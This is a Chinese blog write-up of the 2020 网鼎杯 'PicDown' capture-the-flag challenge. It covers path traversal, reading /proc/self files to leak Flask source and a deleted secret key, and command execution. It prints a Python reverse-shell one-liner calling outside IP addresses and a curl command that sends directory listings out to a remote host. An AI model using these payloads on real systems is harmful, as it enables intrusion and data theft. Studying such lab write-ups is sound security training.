[网鼎杯 2020 白虎组]PicDown --proc文件的利用--python反弹shell

最新推荐文章于 2023-03-24 01:16:50 发布
最新推荐文章于 2023-03-24 01:16:50 发布
阅读量894 收藏 4
点赞数 2
分类专栏: CTF训练日记 文章标签: python 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/121336625
版权

文章目录

前言

这个题跟到wp做的,确实思路很像一个渗透过程了,值得好好学习。

wp

首先打开环境,F12,dirsearch和御剑都没有扫描出什么东西。然后输入一个输入框,填入抓包
在这里插入图片描述
有个url的GET参数,我们尝试SSRF
url=file://127.0.0.1/flag.php或者php伪协议,都没有什么反应。然后尝试目录穿越

?url=../../etc/passwd

在这里插入图片描述
说明存在文件包含,目录穿越可以实现

我们知道/proc文件系统,所以我们使用目录穿越爆出文件目录

?url=../../proc/self/cmdline

在这里插入图片描述
然后直接爆出app.py的源码

在这里插入图片描述

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

进行python代码审计
有用的代码


SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)

@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res

首先知道了/no_one_know_the_manager页面
manager()函数中有个敏感的代码

os.system(shell)

我们可以通过这个shell参数进行命令执行
但是需要key == SECRET_KEY。
我们就需要找到SECRET_KEY
在这里插入图片描述
发现读取/tmp/secret.txt不成功,看到os.remove(SECRET_FILE),说明这个文件已经删除了。
所以我们通过/proc/self/fd/可变数字来获得已经删除的文件内容。
进行爆破
在这里插入图片描述
发现?url=../../proc/self/fd/3是不同,得到

hFp5fd7AAAlgSMgzK7uYKv4yq0BOxauxWmJXwHCaBQY=

这个应该就是密匙了(密匙我重新试了一下不同)。
在这里插入图片描述
但是没有回显ls的东西。
这儿我们就是用python反弹shell

shell=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("101.35.126.83",1515));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

注意我们需要进行urlencode编码。
因为反弹shell的payload中有单引号和双引号,会影响传参。所以使用urlencode。

payload

key=Goqm8uJYz9YzW8b6sO1WxEokWnaXM9TtaBoJIZa6WR4%3D&shell=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2242.193.170.176%22%2C10000))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

注意:
在这里插入图片描述
还可以使用curl反弹shell

?key=YBb%2FolIX5h4ChHDJYy%2BhypD0MtKjJyIs3fI3Jbma1SY%3D&shell=curl 118.***.***.***/`ls /|base64`

因为存在\n,所以我们需要base64加密。
补充:
关于python-c命令:
python -c 可以在命令行中执行 python 代码

python -c "print('TTXT')"

但是引号不要重叠,否则会发生错误,一般使用三引号

python -c '''
import arrow    
print(arrow.now())
'''

可以执行多行代码。

参考

feng师傅的wp
反弹shell]
关于/proc/self的学习

Z3eyOnd
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020网鼎杯白虎赛题.zip
05-15
比赛试题附件,其中包括misc,re,crypto,pwn,web只有题目,没有环境,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
网鼎杯 白虎.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
[网鼎杯 2020 白虎]PicDown(精讲)
最新发布
记录学习,一起进步
03-24 692
[网鼎杯 2020 白虎]PicDown(精讲)
/proc/self/目录的意义
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
Linux的/proc/self/学习
cjdgg的博客
08-23 7205
Linux的/proc/self/学习 最近做的[SWPU2019]Web3和[pasecactf_2019]flask_ssti好像都涉及到了/proc这个目录,所以找篇文章来学习下,看了这篇文章才发现作者是搬运之前我就关注的一个大佬WHOAMI的文章,之前复现漏洞看的就是大佬的文章,这会回去看才发现大佬的博客好像关了,这也让我下定决心要把自己所学的东西记录下来,就算是搬运也要自己记录下来,一昧的收藏文章哪天大佬们把博客关了那就真的GG了。话不多说进入正题 /proc目录 Linux 内核提供了一种通过
[BUUCTF][网鼎杯 2020 白虎]PicDown
cosmoslin的博客
01-24 1008
考点 文件读取 反弹shell 解题 在输入框输入数字会在url后面添加参数,利用该参数来尝试文件读取 获取启动指定进程的完整命令 /proc/self/cmdline 获得 python2 app.py 那么我们再读一下这个文件 /proc/self/cwd/app.py 得到 from flask import Flask, Response from flask import render_template from flask import request import os import u
[网鼎杯 2020 白虎]PicDown
SopRomeo的博客
12-17 744
抓包发现参数是url,猜测ssrf 无回显,测试无果 注意到后面的目录没有php字样,应该不是php写的,有可能是py或者node.js 我试了试文件包含 ?????????我甚至都没用目录穿越 这不傻逼么 题目应该没那么简单,我去搜搜wp 果然没那么简单 先读去绝对路径 /proc/self/cmdline python2 写的flask 读源码,代码审计 看到page这个路由 这个东东冒得用,就禁了个file协议 但是我输入file也没给弹hacker,这我就很疑惑 直接看到最后一个路由.
re学习笔记(62)2020网鼎杯-白虎-Re-恶龙
逆向随笔
05-15 3582
恶龙 题目:恶龙 题目描述:这是一个与史莱姆和恶龙战斗的故事,请战胜三头恶龙,取得flag。张三长老说,试图patch这个程序的人会得到错误的flag… IDA64载入进入main函数 main函数会循环执行dround函数,次数是3次,次数bossexist在main函数之前的init里被初始化。outflag函数输出flag init函数 同时被初始化的还有unief=100 coin(金钱) =5 此时outflag的一个参数flag4已经知道了。。 dround函数里面有三个选项,数字1打
网页图片批量下载精灵v1.6特别版
07-28
图片批量下载精灵是一款从网站上下载图片的共享软件,它可以把网站上的图片都下载下来... 使用方法 安装原版,解压缩附件(PicDown-patch.rar)到目录下,用附件运行程序即可(即以后直接运行PicDown-patch.exe就可以了)~
2022第三届网鼎杯白虎misc830原题附件
09-03
2022第三届网鼎杯白虎misc830原题附件
BUBASE开发接口1
08-08
BUBASE开发接口1
网鼎杯2020.txt
05-24
网鼎杯2020白虎部分题目链接:https://pan.baidu.com/s/1_8iThteUQKj2jBg95nkzEQ 提取码:inrl
网鼎杯SQLI+反序列化读取文件题解
weixin_34032792的博客
08-20 276
先注册一个账号,然后发现http://ede1e494b5d64ab8adc945efde6138b168f86c65a30e4a4f.game.ichunqiu.com/view.php?no=1存在注入 联合查询中union会被拦截,于是用注释符绕过http://ede1e494b5d64ab8adc945efde6138b168f86c65a30e4a4f.game.ichun...
python123平台作业答案第十二周_【2018年 网鼎杯CTF 第二场】红日安全-网鼎杯WriteUp(24日 更新:web详解)...
weixin_39607836的博客
11-24 589
本次比赛主要由红日安全ctf小奋力拼搏,才可以拿到第二场第四的成绩。感谢他们的付出,才可以让我们看到精彩的wp1.签到题2.虚幻题目提示汉信码。使用 binwalk 提取出 9 张图,拼接成如下用 stegsolve 取 R7 保存并取反色补上汉信码的 4 个角,扫描即可获得 flag3.calc题目如下,这是一个计算器,可以执行一些简单的算式。题目提示正则有问题,所以正则应该是可以绕过的。我们...
Python 下载图片的三种方法
热门推荐
qq_34504481的博客
03-27 9万+
import os os.makedirs('./image/', exist_ok=True) IMAGE_URL = "http://image.nationalgeographic.com.cn/2017/1122/20171122113404332.jpg" def urllib_download(): from urllib.request import urlretrieve...
2020 第二届网鼎杯 boom wp
weixin_44533592的博客
05-10 724
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第一个答案 en5oy 继续下一个 解方程,就直接硬着头皮的解答把 答案为: x=74 y=68 z=31 输入答案之后下一题 又是方程。。。。解一个 二元一次方程 x*x+x-7943722218936282=0 自己写了一个python
2022第三届网鼎杯青龙
qq_52193383的博客
08-26 1656
crypto405利用好flag的格式进行分析。将前5个grasshopper的产生过程列出公式来,有:i=0时,k_{10}=g_{0}=chr(‘f’)*k_{00}%p\\i=1时,k_{20}=g_{1}=chr(‘l’)*k_{10}%p\\……
CTF训练之路2--ctfshow内部赛
unexpectedthing的博客
11-07 6554
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
[网鼎杯 2020 白虎]picdown
03-16
picdown 是一个图片下载工具,可以通过输入图片链接,将图片下载到本地。它可以支持多线程下载,提高下载速度。同时,它还可以对下载的图片进行重命名和分类保存。这个工具在网站开发和图片爬虫方面都有很大的用处。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值